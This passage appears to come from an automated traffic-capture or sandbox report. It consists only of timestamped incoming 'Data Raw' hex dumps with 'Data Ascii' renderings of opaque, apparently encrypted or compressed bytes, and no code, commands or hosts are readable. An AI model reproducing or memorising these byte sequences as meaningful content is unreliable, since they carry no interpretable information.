d8 e0 ed 2e c2 9e 35 69 29 25 f0 82 07 d3 7b ae 95 13 09 df 9d 96 10 22 fe 3f f3 4b 79 b1 79 4d 53 65 88 4d 74 2d 44 11 c1 fd 91 e0 a8 f0 29 7b fe 4b 10 d8 e8 65 08 a7 6b 6a 0d b0 3a 66 Data Ascii: ;;C8#R<\6oY'8vWC%jL(?SG*s<>d+'k#b 51_jXP6z$_a8-7/ bAGHQcI#,oXa\|LdD&.5i)%{"?KyyMSeMt-D){Kekj:f
2021-12-01 18:25:38 UTC	64	IN	Data Raw: 74 12 0c 3f 48 02 e1 21 ef b3 e3 64 03 a2 3b d7 b6 6e 61 23 bb ff b8 ae 73 8c 59 d4 8f a7 12 fa 17 3f 1b 3c f6 58 bf 02 04 7f fb 7b 69 07 a8 e2 3a f8 77 e0 1e 42 64 64 c6 15 a6 69 6c 4d 9e 2e 34 80 f5 8d 49 58 1f 1d aa 6a ca 7b b5 0c d0 4e 15 3a 22 d5 a6 76 bc cf 71 cf ca 5b cf 29 52 4a 33 fa d1 b7 48 f1 78 26 c2 32 05 b1 ff b7 4f 21 19 40 4a 44 69 80 4a 2b 96 bb da 0d da 9d 09 4a f7 ab e3 27 2a 85 c8 c5 67 1a 1d 6b b5 1d cf 5e 7c 5d 7a d9 8e af f0 80 82 2c 4c 18 29 a2 e2 61 32 83 e0 4a 07 04 62 27 da c5 7b bc ff 6e 73 98 d6 63 ce 27 b1 55 54 8b 68 81 a5 ab 02 a1 6e 60 95 ef 69 bc 70 18 c1 d2 f2 0c 6c a0 9d a6 0c 74 27 c5 60 1b ec 30 81 63 97 a8 40 b7 19 8b 57 4e 61 73 3e 3c 49 87 28 e0 9d 5f 4f 0f 90 a2 5e b9 af 5d 4b 47 f7 fe 16 61 7e c2 94 34 21 18 37 Data Ascii: t?H!d;na#sY?<X{i:wBddilM.4IXj{N:"vq[)RJ3Hx&2O!@JDiJ+J'*gk^\|]z,L)a2Jb'{nsc'UThn`iplt'`0c@WNas><I(_O^]KGa~4!7
2021-12-01 18:25:38 UTC	65	IN	Data Raw: 28 b0 66 c1 5e 86 c4 21 ac a1 c7 e9 b6 5b 51 66 9a 40 08 c7 a6 ad a2 e9 44 4f 7b f0 f1 cf cb b0 fb c5 a9 6c 04 ed 80 03 ab e3 9c 5e 88 3b 5d 5d 8c f9 82 92 02 68 a0 3d 5f 41 ee 54 59 56 0a e8 63 af 55 94 ca c6 da d1 2b b6 68 cc 35 c8 cc f3 c1 4d 41 e6 58 60 cf cb dd 35 80 52 63 13 16 99 6d 0c 0c ab 21 8f d0 27 64 14 76 76 0a 14 b9 6b e1 5d 60 e2 46 a2 30 77 4f 59 eb 25 a5 ae 02 75 a4 4a 6e fe 88 34 b4 99 bd 1e 54 bd 42 71 40 9f 66 52 99 3a df 30 82 4e 70 6e 96 52 14 f4 a0 c9 e5 41 33 d7 94 35 14 c0 4e 5f 3b 37 f2 68 b3 38 d4 27 b5 da b3 e1 fc 69 5d 44 cc 1d 8e c0 2a 15 14 03 19 65 b4 04 dd 4f da f8 ef ad cb 97 b4 a8 ab a8 36 f0 cd b4 b2 4f 46 a0 d4 ae 41 e7 c8 3a a3 67 92 e0 de 07 4f 3c b9 3e 7c 17 ab 84 bf cf 36 e3 ad b0 5e 15 4e 52 ad 78 c8 58 fa 1a 05 Data Ascii: (f^![Qf@DO{l^;]]h=_ATYVcU+h5MAX`5Rcm!'dvvk]`F0wOY%uJn4TBq@fR:0NpnRA35N_;7h8'i]D*eO6OFA:gO<>\|6^NRxX
2021-12-01 18:25:38 UTC	66	IN	Data Raw: 18 81 21 76 99 52 7c 61 82 67 38 b7 92 f7 7f 58 9a e3 39 1a 02 20 9a 19 3d ba 31 1b aa 18 20 87 a4 b8 e1 4c e2 70 91 40 1a ff 0b d2 fc 24 b5 cb c0 bd 1f 3a e1 51 f9 e0 d6 92 16 4d 82 51 4c 6f ef 37 71 5c 10 82 5b 45 fe 94 1c e2 22 94 b9 d7 81 b7 b4 bf 7b 6b 56 7f 5c ab 8c ad cc 77 37 11 f1 e9 cb 33 d9 4c 35 6e 3f d7 f9 09 10 a1 51 19 49 b0 83 e7 48 a6 5f 72 b7 c4 f5 bf 4e ae 42 c9 a1 1b 0e 51 ef 2c e0 81 97 6d bc 70 21 57 72 f4 20 e3 44 ec e7 f7 95 df 5c 20 2f 9c 47 a9 e3 a4 7d cc 5a c7 8c 30 9b d5 b0 c9 96 79 89 da 0c df ba 88 89 26 a2 de 17 17 11 46 ca 25 f6 63 ac d5 94 f6 88 bd a0 7a c8 0c 33 e3 a8 bd 65 2a 82 88 db 9b de 5b 88 a6 a9 81 96 ab 8a ff c4 36 44 9e e7 39 af 62 36 9b 6e a0 bd 9b fd dd b9 d1 b4 8b 7e 2f 74 84 94 85 81 fe f8 88 6c 84 47 b5 18 Data Ascii: !vR\|ag8X9 =1 Lp@$:QMQLo7q\[E"{kV\w73L5n?QIH_rNBQ,mp!Wr D\ /G}Z0y&F%cz3e*[6D9b6n~/tlG
2021-12-01 18:25:38 UTC	67	IN	Data Raw: e2 3d 37 a1 7d cf f7 ee b9 ac 22 43 3f 9d ef 7f 7c 2c 8b 59 d0 13 8c 1a 20 fd 38 4f 89 f0 21 23 44 fa b4 c5 3b 1f 70 af 6d a8 cd 53 62 b5 f7 57 d3 92 38 f7 7a c3 46 f5 38 3a 49 1c 97 46 4d 45 a8 76 eb d0 e3 f6 cd 7a e0 f1 5a 56 69 ed f1 df af 10 27 3d 6a f0 e1 c1 ae a0 8a bb 18 74 4b a2 0e 0f a0 24 29 ab 17 b4 4e e8 38 7f bb d6 c4 21 6f b5 66 b6 87 c6 49 b9 cb ba 94 61 ae 82 e6 5e 09 42 5f a4 ca 46 f9 30 f4 0e d9 5d bb f2 6d 69 6d aa 75 a4 34 68 b9 b6 1c 50 01 16 6d 89 e1 12 7c 47 60 68 96 a5 d8 cd b8 5e f8 4d 11 96 5a cd c1 a1 a4 a7 9d ee b8 74 6a 05 39 9b bf 6b ac 41 31 3d 14 08 7c c5 ed 6a 2e c5 19 f6 00 91 75 58 66 76 0b 85 c7 e7 f6 c7 6a f0 a1 e9 d1 a1 ba a8 d0 dc 41 c5 e2 30 f2 f9 71 29 40 c6 5c a2 28 c8 e4 f4 74 90 78 18 35 17 1d 0d 72 b3 92 ce 5f Data Ascii: =7}"C?\|,Y 8O!#D;pmSbW8zF8:IFMEvzZVi'=jtK$)N8!ofIa^B_F0]mimu4hPm\|G`h^MZtj9kA1=\|j.uXfvjA0q)@\(tx5r_
2021-12-01 18:25:38 UTC	68	IN	Data Raw: 9f 5d 20 8c 2f 18 73 7a 3b cb 17 7a 71 98 da a3 c9 95 4c 7c 3f c9 f1 ef d5 f1 a1 83 9d e7 59 c3 b6 b3 c3 44 51 7a 17 92 b4 c7 fd fe 49 31 55 eb 5c 4c 7c 4f 2a e1 79 4c 55 0f 0f 5a ea 45 b6 e1 f5 95 00 49 38 54 d1 b4 df 2d 15 fe 0a 8a 76 5d a0 f9 bf da d9 42 4f 8a cf a9 e9 03 11 8c 9e 6c 92 18 2f 0d e1 94 7e 2f a0 60 0c 28 fe a7 34 53 86 3e 5c 65 e7 16 67 20 d5 5d 0b 1f 26 1e 6f ab 49 21 5a 1c 57 9c 9d 8a 98 fc 72 7f 32 af 16 1a ca d6 b8 61 a0 56 14 f1 7a bc 02 05 c3 13 12 a7 98 19 a3 de fe 3f b8 17 37 9d 49 52 0e 74 db 3f 4d fd af ec 96 c8 2f 1f aa 7d c9 5c 0e 44 94 c4 a4 41 18 af 63 7d 2f 5b 4b 99 51 2e f4 6d f0 eb 17 c8 e9 3c 8b 0a 32 c8 c4 7c 7f 1a ba 37 4c 8f e4 4c b5 2a 64 7b 2e 75 5d 81 c0 55 17 01 d1 a6 1c d4 09 ba c6 8e 25 c0 d0 73 f7 6d df 00 b8 Data Ascii: ] /sz;zqL\|?YDQzI1U\L\|OyLUZEI8T-v]BOl/~/`(4S>\eg ]&oI!ZWr2aVz?7IRt?M/}\DAc}/[KQ.m<2\|7LLd{.u]U%sm
2021-12-01 18:25:38 UTC	70	IN	Data Raw: db 60 66 1c 74 32 4c 18 78 9e a9 0d e2 a3 a0 4a 64 5f 99 a8 60 5e b4 ce 54 1c ed 92 68 23 a9 7f fc 2c 52 cb 22 c5 e4 07 64 25 62 1d cb 22 44 c5 f0 7d be 61 f1 ab 21 25 1a e5 34 e2 27 bf e9 cb 58 d4 2b a3 6c 0a 54 43 dc 62 22 0b ab 6e c1 66 78 f5 dc ee 0d a9 ac e0 e2 a4 cc d6 c3 aa 28 23 63 76 78 80 da 75 57 80 29 21 e2 1c 29 b7 31 8a c5 15 db 25 38 72 ce be 6e cd d5 2e 57 f2 1b 6d 93 44 8f 44 fc a3 2e d0 58 a4 11 2d e0 1f bf d3 1a fa 38 f2 0c 06 a0 4e 29 da fa 15 7a 90 93 6e 33 4a 2c ee d5 7c a7 e4 74 a8 af a0 a6 8e 55 88 91 3f 7f 4a 9b 8f f6 18 d9 5b 47 24 d1 e2 b2 9c 2e 3e ea 80 ed 0d 34 97 d1 f4 1b f7 1e 9b 74 ff 92 8f 20 c1 89 99 8d b6 e1 bc 0c 3c 16 02 e2 63 38 be 64 38 40 68 43 4a cc 4f e0 58 bd b5 1f 4a 5f ac 99 eb a1 9b 99 9f f8 46 e4 d1 33 12 b1 Data Ascii: `ft2LxJd_`^Th#,R"d%b"D}a!%4'X+lTCb"nfx(#cvxuW)!)1%8rn.WmDD.X-8N)zn3J,\|tU?J[G$.>4t <c8d8@hCJOXJ_F3
2021-12-01 18:25:38 UTC	71	IN	Data Raw: 50 e0 46 2c d1 f0 4a 98 ae 8a d0 8e 5f a0 15 be 9a da f3 6f 45 c6 c4 f8 8b 50 d2 40 a6 50 e8 f1 b8 b9 d3 2d 2d 5a 92 ea af cb 97 b5 d3 26 1f 57 df 0c bf 25 14 f3 b6 c2 15 e8 9b 41 20 9c e2 b1 af eb 0f 78 c0 72 f1 b1 61 d2 cd 01 37 fe 2b c2 55 12 de 9e c0 9a 95 98 db 9d 78 48 48 50 74 c7 47 e7 5a df d0 91 c9 ce 4b e7 8b bf 81 ef f4 52 41 df ee 3a 8c d9 5c 3e 20 cf ee 9f eb 39 81 47 3c 6d 5d 33 f4 f3 d5 7c 0f 50 0c 1b 44 90 db 2f 8b af 24 eb da 27 14 bc 01 b4 a5 c8 7b 09 c5 b6 72 23 c4 0d bb 6e 1e 41 b8 67 cc 0d dd 91 b0 e2 0b 77 70 ba 1f f2 9d 13 a9 d3 2d 5a 1a 4d fb f9 b7 fa f5 ed ce 71 5a 63 69 60 ea a8 dd dd 78 c5 c4 81 8e 7a 55 ab 8e 3b c1 08 49 32 44 45 81 55 24 a7 29 2a 44 17 3f 0a 17 5b 81 6d 24 e2 e9 28 ed eb 7e 1f 7e 8b 5b a8 7a 7b 50 50 9a fe 22 Data Ascii: PF,J_oEP@P--Z&W%A xra7+UxHHPtGZKRA:\> 9G<m]3\|PD/$'{r#nAgwp-ZMqZci`xzU;I2DEU$)*D?[m$(~~[z{PP"
2021-12-01 18:25:38 UTC	72	IN	Data Raw: 56 39 6b da c9 c3 72 1f 55 0e e9 92 76 fe 8a af 05 69 bf 96 ea 9e 74 d9 c5 04 83 b9 06 2f da 73 e1 eb 74 82 af 46 38 15 c0 eb e3 4f 91 10 dc fc 2c 60 dc 3d 3a e8 d0 1f 8a eb d7 21 0d 4c fa 85 31 5c e1 b7 14 00 ad 92 bd d5 99 41 84 14 b1 09 06 2f 1d 74 67 3a d6 f8 21 2a 5c 1e 6b 13 b3 22 b6 65 e9 28 59 ce d7 a5 38 4e 05 47 14 9e b8 39 94 30 00 da 3f 90 63 56 21 a9 59 49 fd ba 30 de 4b 27 c1 a1 87 b7 db ff 4b 1d 9e f4 a9 e6 f1 30 29 1a 46 4a 33 66 f6 bd 11 51 de 3c 93 d2 30 86 51 68 fe d8 43 d7 11 f6 39 c0 e7 72 0b 6f 92 6b df bd 7b 19 22 00 24 86 68 e5 e7 04 00 1b 70 f4 89 92 7b cd 30 70 50 45 bc 08 36 4a e7 23 fe 9d d4 3f b0 a7 31 fa 5e 99 7e 0d cf f1 42 4b 2b 3c 0d f4 31 13 97 7f cd b3 c3 5a 98 39 29 8b 7b 55 95 54 d7 3d 52 83 fa 05 46 c4 cc 2a b5 17 32 Data Ascii: V9krUvit/stF8O,`=:!L1\A/tg:!\k"e(Y8NG90?cV!YI0K'K0)FJ3fQ<0QhC9rok{"$hp{0pPE6J#?1^~BK+<1Z9){UT=RF2
2021-12-01 18:25:38 UTC	74	IN	Data Raw: 39 91 6d 24 88 c0 bd c9 24 f2 01 8d 55 e8 56 d6 f2 19 91 15 d3 d8 e2 51 f3 d4 ce 09 cc 89 92 12 a0 c6 15 20 0c bb 91 c7 ce 0d 6c dd 6a 33 82 33 03 12 39 95 7b dd 6e 66 42 a5 e7 8d 86 30 60 f4 78 25 07 6a 71 94 67 69 7d ad ce 86 9d b0 86 75 f6 5d f3 61 88 67 2c 10 85 dd d0 a9 af b9 79 2c 42 a0 e5 63 40 36 61 67 8e b8 88 3e 8f 09 e1 69 e9 cb 2d 11 6d dd 21 aa aa 51 7b 35 20 5e 85 2e fa 86 bf 09 84 21 92 df ef 48 eb a9 00 9f 9a a3 50 8d dd 5a a7 b6 3c 24 96 e4 a3 fa 28 4d b6 fd b3 0b 6d 85 6e 18 22 e8 3e 6a cc 3f a6 d4 01 14 78 0e 94 69 10 eb f8 8f 8c a0 a6 1d f1 f1 aa b8 c3 5f d0 2f 88 6f 55 0c f2 aa 82 cb 48 40 59 a9 c6 04 cc a5 00 4d d3 d7 f5 42 6a 70 f0 67 e2 54 da 2e 60 99 06 50 9f 14 fd 03 ac 10 cb 48 19 e9 70 fe d4 47 f8 1a e9 a8 30 24 f7 40 49 c0 14 Data Ascii: 9m$$UVQ lj339{nfB0`x%jqgi}u]ag,y,Bc@6ag>i-m!Q{5 ^.!HPZ<$(Mmn">j?xi_/oUH@YMBjpgT.`PHpG0$@I
2021-12-01 18:25:38 UTC	75	IN	Data Raw: af bc 7d 93 e7 d9 06 63 33 79 da 70 ab 16 6c 7a 3d 12 2e 5b 0a 2b fa eb ea 4c 90 72 57 54 59 37 c6 66 8d 9b 00 1b 8a 70 70 c1 d8 91 08 3a 7f 98 4e 74 e2 0b 7f a9 f0 db be d5 a8 25 0c 30 f3 6b 68 43 b6 8d 04 89 6c 6c 4c 65 0b f8 58 48 61 a8 d7 18 3f a7 39 86 2a 3c a3 ad 65 0c a5 41 98 57 ae 23 dd 9f f0 57 53 da 3c 8e 4b fe 85 ec 32 60 fd 5d 4e 22 19 c9 5f 3f d8 f2 61 b5 79 87 db 36 36 e2 17 82 8f 2f 34 bc 5f d7 51 04 77 3b c6 b9 f4 21 b2 1b e0 a4 2a 91 a9 a7 93 5e 03 87 3b ec 67 50 6b b8 3b 47 e2 fc 92 37 4e 4b f2 56 05 2f a8 41 0b db c0 cd ad 3c e1 bb c2 3b 3b ee ce 70 03 57 48 64 04 18 96 fe e8 40 f7 a3 a0 3f 0f 1f b2 09 f4 92 82 52 20 c2 17 da af f3 5f f4 18 ad 00 01 17 14 bc c8 f1 64 9f c0 1c 7b 78 99 4a 64 4c 3e 86 1b 6d 14 47 af 5e 40 2d c6 33 8f ac Data Ascii: }c3yplz=.[+LrWTY7fpp:Nt%0khCllLeXHa?9<eAW#WS<K2`]N"_?ay66/4_Qw;!^;gPk;G7NKV/A<;;pWHd@?R _d{xJdL>mG^@-3
2021-12-01 18:25:38 UTC	76	IN	Data Raw: d9 a1 6f 92 10 5e 44 64 41 86 5f 41 01 d1 45 4e bb 1c ac e5 05 fc d6 68 e3 9a 44 c4 58 e6 14 ac 21 71 fc 54 04 08 18 46 db 85 69 d1 3a c4 d4 30 51 d3 df 81 41 ad 75 a0 b4 3b eb a5 cc d1 b2 a1 db fa da 66 1f 5c bc 42 a6 be 96 75 a4 71 b6 ae 2c cb d9 cd 69 c5 36 ce e2 7b ac e2 1a 1f e3 7f 59 bd 26 51 1c 8b 21 a4 9b a4 22 b3 c9 cf 13 f9 66 62 65 db a8 8b d3 5a 3c a9 fd 5f 28 98 d4 34 a9 30 2e b8 34 23 a8 32 bf 2a 39 47 ac 87 9a d0 13 8c 18 f5 f3 f7 a2 3a a7 aa 08 3d c7 da 27 a4 02 aa 6f 28 2b f2 dc 70 ac f7 2b 33 ae 4d 5f b2 7a d9 09 6d a3 54 42 ae b9 68 bd 84 0a 47 d0 84 5f 47 47 0b 82 34 26 d7 f8 a0 6f 9b 0e 27 03 09 40 17 d6 e5 ab 8a 31 83 e1 ea 5c 33 7e a8 8e b7 7b e4 19 42 e0 bd 02 ee c7 7e a8 ad fe f5 b8 34 28 b9 56 34 b4 f8 95 cd a5 6d f7 7d 38 46 b7 Data Ascii: o^DdA_AENhDX!qTFi:0QAu;f\Buq,i6{Y&Q!"fbeZ<_(40.4#2*9G:='o(+p+3M_zmTBhG_GG4&o'@1\3~{B~4(V4m}8F
2021-12-01 18:25:38 UTC	77	IN	Data Raw: ed f4 02 29 5b 5e a2 59 bb 11 22 d6 98 b2 fd 74 af 52 57 71 f2 fb 6a dc 1b 40 47 60 78 2a 54 4d c9 d2 72 5b 36 da 51 91 88 28 36 fa 7b 15 39 9b bd c8 7d 5f a3 42 c5 5c 7a 78 aa 88 40 a5 78 e6 43 23 aa 9a 76 da 0d af 5a f5 15 04 dc d4 ae 9d c5 58 0f 94 2f b6 20 c3 6e 3d 95 6c fd 95 9a c0 cb e8 bf 4c 47 9b 49 91 12 11 6c 48 ec 26 3d a8 b6 e2 83 1f bd 14 e6 1e c0 e2 db 59 42 7f 5a 3f d3 ce 27 dc 65 bb a1 e1 7b 5a 1e d6 c9 e4 eb b4 a4 f9 07 e7 37 b6 0f fc 38 39 09 4e b3 cb 40 d3 c6 4c 3a a3 9b 79 4e a2 b3 50 6c e6 bb a7 8f 65 0d b2 90 57 f8 9a a5 7d 0f be 63 b2 cb 3e 18 d0 a4 59 c0 ef 4e fe 0c 76 b1 d7 99 44 74 15 d5 0d 8e 1c 75 da b2 6c cb 64 2f ff 5a 63 de a3 4c ca a2 a8 a3 97 be 48 94 f0 0c 3c a2 c2 7c f0 9a 4b c5 f0 ea 87 f0 4e 17 ff 0a ca 70 e4 d8 d8 2f Data Ascii: )[^Y"tRWqj@G`x*TMr[6Q(6{9}_B\zx@xC#vZX/ n=lLGIlH&=YBZ?'e{Z789N@L:yNPleW}c>YNvDtuld/ZcLH<\|KNp/
2021-12-01 18:25:38 UTC	79	IN	Data Raw: 5e 64 18 ae 01 43 1d b0 c2 5f 7e 2d 99 cb d6 29 a9 fc 6c 12 97 9d 48 bd 88 c8 54 ee d3 c9 db 56 a6 71 2b 82 99 26 25 85 07 5b 8a 2a 71 e2 9b 67 9c 94 bb b9 fa 15 5b 6e 06 1f 3d 6f 9f b4 cb 98 8d 68 cb a0 de a3 59 fe 8f 33 d0 bc a4 9a cf 5f da 5e 52 1a e0 92 56 90 c7 f9 fb 33 40 05 88 58 fb eb 95 46 15 ad d7 09 eb f8 db d0 93 0e f4 1a 9d ee 79 07 da ff 11 c6 27 f8 c5 cf a8 29 29 02 22 2c 1b 13 54 6b 33 dd f7 19 0e e6 d5 58 bd b3 f6 42 7d f6 d4 aa 13 bb 12 11 90 8a 2c 2e d4 96 98 95 16 9b 78 f6 9e e1 b3 c5 9a 23 a3 c5 e4 0e ab 40 b0 cc f2 80 6c aa 01 62 cc 0d 4a 53 04 50 a0 b7 af 9d e1 47 a7 c1 e2 d3 f2 9c 3f 84 ee 59 56 d3 88 6d d7 9d 7f 29 83 08 12 22 f5 0d c7 57 21 9b 55 58 92 20 61 85 48 50 cf 4b 21 27 8d 7a 48 bc a8 39 96 15 6e 9e 71 b0 d0 ba e9 0e 91 Data Ascii: ^dC_~-)lHTVq+&%[*qg[n=ohY3_^RV3@XFy'))",Tk3XB},.x#@lbJSPG?YVm)"W!UX aHPK!'zH9nq
2021-12-01 18:25:38 UTC	80	IN	Data Raw: e8 41 73 a6 3d 7f 0c 74 4a db 4b b6 26 49 5b c6 93 35 49 42 f6 23 06 fb 0e 2f 26 08 69 a4 17 d8 8e 2e 68 38 db 8f 95 55 80 c2 9e ab 67 f1 52 5a 31 f3 4d 33 10 09 dc cf 69 55 3f b6 af 64 9d 58 80 33 c1 93 4a 19 1f 6d d0 1f 51 7a cc 07 6f 34 9c 01 a6 5b 51 36 4e cd 69 3e e6 14 d6 b1 08 77 b1 a5 9e 65 42 e7 6a 10 14 e6 d3 62 53 43 d6 77 d8 fa 96 09 16 e5 9a 87 26 57 cc ed 4c 1f 9a d3 c9 bd 04 e3 07 6e 9b b8 8e df 7d 91 ec 25 36 be 6b 95 2e 1d 73 0d 5f aa 82 bf 3f b9 d8 59 0e 83 f4 2c 59 d2 de 01 f8 a9 88 9d bc 41 59 c7 ef d2 ef 81 b0 ac 17 6b c8 6d 64 dc 83 9d e7 06 6b b4 a0 a2 9d 7b 1b 3d 4a 73 cb 20 46 2c 84 9c ac 1e 57 75 4c e4 fd ee d0 36 50 f9 8a 88 bc 94 eb 7a 29 98 27 b4 ef da e2 59 9d ec ef 93 71 65 29 3f 10 2e f4 e8 e4 7f fc f8 45 34 ea 2c 36 bc 7d Data Ascii: As=tJK&I[5IB#/&i.h8UgRZ1M3iU?dX3JmQzo4[Q6Ni>weBjbSCw&WLn}%6k.s_?Y,YAYkmdk{=Js F,WuL6Pz)'Yqe)?.E4,6}
2021-12-01 18:25:38 UTC	81	IN	Data Raw: 2b ef 37 bd ba 30 ba 33 83 30 b7 6c 48 75 07 1d 20 9a ad fc d3 4f 5e cd c4 3c 7f 4b b1 69 07 ae e2 1a 9b 5c 25 3e 98 16 d6 99 32 8a c9 16 4e e9 94 33 63 a8 73 a2 47 11 ae 4d e1 c6 75 ed 87 a6 55 c9 6e 42 c1 b9 8b 84 c5 f0 3b 54 d8 b2 0e 86 fb 1e 98 c3 7b 65 23 63 89 5b 7c 19 f4 a7 e0 e6 df 6d 3d 36 4c 7d 80 42 a6 13 47 fa 23 51 72 b1 ca ba 4f 0b 68 63 d6 62 4e a3 ff 41 4e c5 e2 69 10 6c 22 c6 d5 2f 9b 1d 50 7e 51 8e 0c 4c 46 a3 61 ec 98 47 ad f8 c6 9e d8 8a a0 6f 46 17 ac 07 eb 91 15 7c 28 d0 46 8d f1 57 7f d4 d6 68 c1 25 e9 d0 79 69 ac 4c ff b7 82 a2 85 11 18 d9 e7 94 72 ec 92 36 19 e4 0c 40 95 26 d1 84 95 90 f6 85 4c dd 3e 21 2a ec 1c 6b 13 6f 8c 70 6e b9 53 e7 b8 56 1f c9 b2 f9 4b f4 fd 10 9a 34 94 a1 ac bf d1 36 50 80 1f e6 e5 f8 cf 3e 76 69 ad 4f 73 Data Ascii: +7030lHu O^<Ki\%>2N3csGMuUnB;T{e#c[\|m=6L}BG#QrOhcbNANil"/P~QLFaGoF\|(FWh%yiLr6@&L>!*kopnSVK46P>viOs
2021-12-01 18:25:38 UTC	82	IN	Data Raw: fa da 68 a4 cc 53 0a 6d 88 83 00 16 dc 6d 78 4f df 24 7d 66 65 81 df 2a b9 a4 d1 b9 c2 5f c1 be 5f 5d 58 eb 6d a6 6c da df 00 9f 18 37 0e 73 91 cc ba 61 2d cb 34 17 3b 71 94 5a c3 0f cc bd 0c f4 ee 40 7a bb ab da 75 14 98 4a e3 c6 62 6d a9 97 b5 5c 4b 61 f1 23 3d 03 8a ce 73 c2 cb 80 bc 6c d6 c8 b5 df ca ad 22 bc 5c f7 6e b5 37 cb d7 88 78 ce 48 fb 61 09 cb 98 51 2b a6 eb 47 b7 a1 32 4f a4 c1 70 4a 10 b9 25 c7 a2 b6 ed cd 1e a8 ed 58 5b fd f8 c1 6f 4e ea 94 9c 86 ed 89 4a 51 6c a6 bd 0d 05 d1 ac 87 18 e7 46 d6 2e 1f 91 8a 2b cb 79 cf 31 5e b0 9a 51 2a bb 11 f9 e3 b8 51 d9 2b 63 71 54 10 4f 70 1e 77 f8 56 94 ed c3 f5 37 14 f6 77 2f 9e af e7 e1 cc 07 26 a6 30 ca 42 ad ad 62 a9 e8 c6 b6 e2 83 49 59 97 96 0e 9d 76 f9 f2 c3 af fc 21 e4 b0 6f e4 2d 2a 48 ba d3 Data Ascii: hSmmxO$}fe__]Xml7sa-4;qZ@zuJbm\Ka#=sl"\n7xHaQ+G2OpJ%X[oNJQlF.+y1^QQ+cqTOpwV7w/&0BbIYv!o-*H
2021-12-01 18:25:38 UTC	83	IN	Data Raw: 6e 2f 3c 3a 88 1b ed 02 4f e2 da 99 68 cd 81 c4 24 1c 27 e1 de c0 36 09 94 3d 6e 00 52 52 88 4a 2c ff a0 38 58 5e ef 91 62 dc f1 88 86 62 57 cc a9 bb 0a 3f fb 8b 09 bc 94 20 39 86 bf a3 78 8a ad 39 3f c3 48 f1 6c df 44 c5 09 60 97 89 6a e9 7c a2 96 52 c2 38 7c a8 af 48 4e 0d 70 c1 4e 8e 7e b0 8c c4 72 c1 b6 5b 51 e5 7c 9c 2c f9 18 35 26 36 6b 8d 3b 2d 48 cb 56 fd a9 62 a9 92 ad 6c 54 06 d4 f7 dd bb 65 c5 5a 69 9f c1 3d bf 7b eb e3 fe 12 69 a6 ad ef 24 26 a2 d6 3f 38 99 4c 34 da 6d 2e c1 6f a3 60 b4 db 79 67 4e 8a 00 40 40 d8 c5 c8 82 f4 95 64 b3 c9 e6 5e d3 d8 e7 1f 40 df 44 24 1c ff 33 25 d9 d8 b3 2a 62 7b 1d 3a 2d 10 cd 0e 72 9c 76 9b 30 5b a3 21 5a 26 6e 32 3f 59 13 ea 16 fd 69 42 d0 03 0e b3 71 44 74 cf 63 3e 96 5e dc 29 b2 3a b5 ef d8 e1 a9 93 61 93 Data Ascii: n/<:Oh$'6=nRRJ,8X^bbW? 9x9?HlD`j\|R8\|HNpN~r[Q\|,5&6k;-HVblTeZi={i$&?8L4m.o`ygN@@d^@D$3%*b{:-rv0[!Z&n2?YiBqDtc>^):a
2021-12-01 18:25:38 UTC	84	IN	Data Raw: d6 de 80 52 34 31 73 c2 df 59 4c d9 72 48 3c 82 75 52 20 09 83 3f 13 cc f1 c8 b6 b0 70 bb 68 8d 69 11 cd 20 d5 a4 18 14 47 73 d5 73 4f 0b 40 93 1b 7a 7d ec a0 6a 34 ad cd e1 36 e8 a4 4f 09 27 2c 33 c7 54 6b 9d f4 b0 fa ef b3 11 91 4d e1 76 76 ed 87 1e ab cf c1 fa e2 e4 38 73 cb 61 cf 31 2e 44 64 ae 98 ab 31 1e 00 98 af 26 7d 86 b4 a4 40 27 96 bd 60 92 3f ff ba 54 90 b9 aa e3 50 88 54 e2 7d 64 8e f8 2f 30 84 9a 28 16 c4 86 47 0e 87 e0 e2 e3 65 78 29 c6 54 e9 26 05 e8 da 08 30 64 bf 95 16 ea 69 85 48 14 8f 50 28 aa 5f 59 dd 41 00 3d ae fd c8 56 cf 27 86 48 de 4f a8 7f e4 c2 5d 68 55 16 2f e0 63 2d 88 ff 67 4e 0d f3 93 05 4c f2 8d d4 49 2c 06 e6 d0 cc 44 95 66 fd 5c fa bc 00 5f 3a f1 e0 55 72 70 86 67 ed c7 25 04 8b 18 d7 d2 d1 50 17 d9 0a 2f f8 eb ea f4 be Data Ascii: R41sYLrH<uR ?phi GssO@z}j46O',3TkMvv8sa1.Dd1&}@'`?TPT}d/0(Gex)T&0diHP(_YA=V'HO]hU/c-gNLI,Df\_:Urpg%P/
2021-12-01 18:25:38 UTC	86	IN	Data Raw: fc 11 d8 d2 57 75 c6 89 da fa 96 88 d4 a3 34 7f 42 b2 d0 9f 99 2d fc c4 1e b5 1b d6 2f eb 0b b7 9e ed 42 5d 33 39 5b 08 42 8d 66 dd 4b 76 2d a1 a1 02 00 6a 5b a9 85 d3 51 88 44 e3 25 fe 0a d4 76 22 24 f3 e6 ef ee 5b 55 ef 35 75 ee ea 4b b3 4f 33 53 a1 3b 5e ab 82 64 e5 bf 60 96 5c 03 13 92 e1 47 73 12 79 d2 ac 6e e6 ea fc 28 bc ea 89 fd 83 74 18 a6 b6 54 eb e3 94 59 44 72 0d 41 43 70 8d 08 3a 31 19 4c f7 f8 83 ec 3a d0 85 6b ee f4 87 14 60 7f e0 f7 af 70 f4 8f 91 0a 57 4b 80 d9 91 15 d2 57 a4 14 93 c0 1a 6e e8 df c5 99 02 78 28 4a 0c 30 cd f8 af 1d 10 2b 3a ba 48 67 54 7a a5 54 01 0c 71 45 a3 e8 87 c6 a7 b9 18 8e bf 29 33 10 39 6b 1a ae 3f df 46 88 63 c4 80 75 b3 18 f4 f4 d8 82 88 57 2f ef 38 32 39 32 76 cf b0 7e 14 36 ca 7b 69 67 1b 21 ff 6e 8b 84 17 9b Data Ascii: Wu4B-/B]39[BfKv-j[QD%v"$[U5uKO3S;^d`\Gsyn(tTYDrACp:1L:k`pWKWnx(J0+:HgTzTqE)39k?FcuW/8292v~6{ig!n
